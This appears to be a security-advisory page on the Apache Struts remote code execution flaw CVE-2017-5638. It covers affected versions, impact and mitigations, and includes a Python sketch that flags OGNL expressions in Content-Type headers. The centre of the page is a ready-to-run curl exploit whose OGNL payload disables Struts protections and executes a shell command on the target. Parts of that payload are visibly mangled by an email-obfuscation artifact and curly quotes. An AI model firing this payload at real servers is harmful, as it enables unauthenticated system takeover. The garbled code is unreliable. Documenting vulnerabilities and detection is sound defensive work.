Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


CVE-2017-5638 is a critical remote code execution vulnerability in Apache Struts 2 caused by flawed error handling in the Jakarta Multipart parser. An attacker sends a crafted `Content-Type` HTTP header value to a server that processes file uploads. When the header value is invalid, the parser tries to generate an error message, but in doing so it evaluates the header value as an Object-Graph Navigation Language (OGNL) expression. OGNL code injected into the `Content-Type` header is therefore evaluated and executed by the parser. Because OGNL expressions can run arbitrary system commands on the underlying server with the same privileges as the Struts application, this bypasses the application's security controls and gives the attacker full control of the vulnerable system without requiring authentication.

Platform: Apache Struts

Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability: Remote Code Execution

Severity: Critical

Date: March 2017

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`

How the Exploit Works:

Craft malicious Content-Type header.

Target Struts file upload endpoint.

OGNL expression evaluation.

Arbitrary command execution.

Protection from this CVE:

Apply vendor patch.

Upgrade Struts version.

Use alternative parser.

Input validation filters.

Web Application Firewall.
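
A defensive sketch of the "Input validation filters" and "Web Application Firewall" items above, added here as an example and not taken from Struts or from this page's source: it validates `Content-Type` values against the RFC 7231 media-type grammar, flags OGNL expression openers (`%{`, `${`), and checks a version string against the affected ranges listed on this page. The function names, the 256-character limit and the sample requests are assumptions constructed for illustration.

```python
import re

# RFC 7231 media type: type "/" subtype *( OWS ";" OWS name "=" value )
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_PARAM = rf'[ \t]*;[ \t]*{_TOKEN}=(?:{_TOKEN}|"[^"\\]*")'
MEDIA_TYPE = re.compile(rf"{_TOKEN}/{_TOKEN}(?:{_PARAM})*[ \t]*")
# OGNL expression openers; "{" is not a legal token character in a media type.
OGNL_OPENER = re.compile(r"[%$]\{")
MAX_LEN = 256  # assumed ceiling; legitimate Content-Type values are short
# Affected ranges as listed on this page (inclusive).
AFFECTED = (((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10)))


def classify_content_type(value):
    """Return 'ognl', 'malformed' or 'ok' for one Content-Type value."""
    if OGNL_OPENER.search(value):
        return "ognl"
    if len(value) > MAX_LEN or not MEDIA_TYPE.fullmatch(value):
        return "malformed"
    return "ok"


def is_affected(version):
    """True if a dotted numeric Struts version falls in the page's ranges."""
    parts = tuple(int(p) for p in version.split("."))
    parts += (0,) * (3 - len(parts))  # "2.5" -> (2, 5, 0)
    return any(lo <= parts <= hi for lo, hi in AFFECTED)


def scan(requests):
    """Return (client, path, verdict) for every request that is not 'ok'."""
    verdicts = ((c, p, classify_content_type(ct)) for c, p, ct in requests)
    return [v for v in verdicts if v[2] != "ok"]


# Constructed sample requests (client, path, Content-Type); harmless placeholders.
SAMPLE = [
    ("198.51.100.7", "/upload.action", "multipart/form-data; boundary=----x9f2"),
    ("198.51.100.9", "/upload.action", "%{(#_='multipart/form-data').(PLACEHOLDER)}"),
    ("203.0.113.4", "/login.action", "application/x-www-form-urlencoded"),
    ("203.0.113.8", "/upload.action", "multipart/form-data; boundary"),
]


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Filtering of this kind is a compensating control in front of hosts that cannot be upgraded immediately; moving out of the affected version range removes the flaw itself.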

Impact:

Complete system compromise.

Unauthenticated attack vector.

Data theft and manipulation.

Installation of persistent backdoors.

Service disruption.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
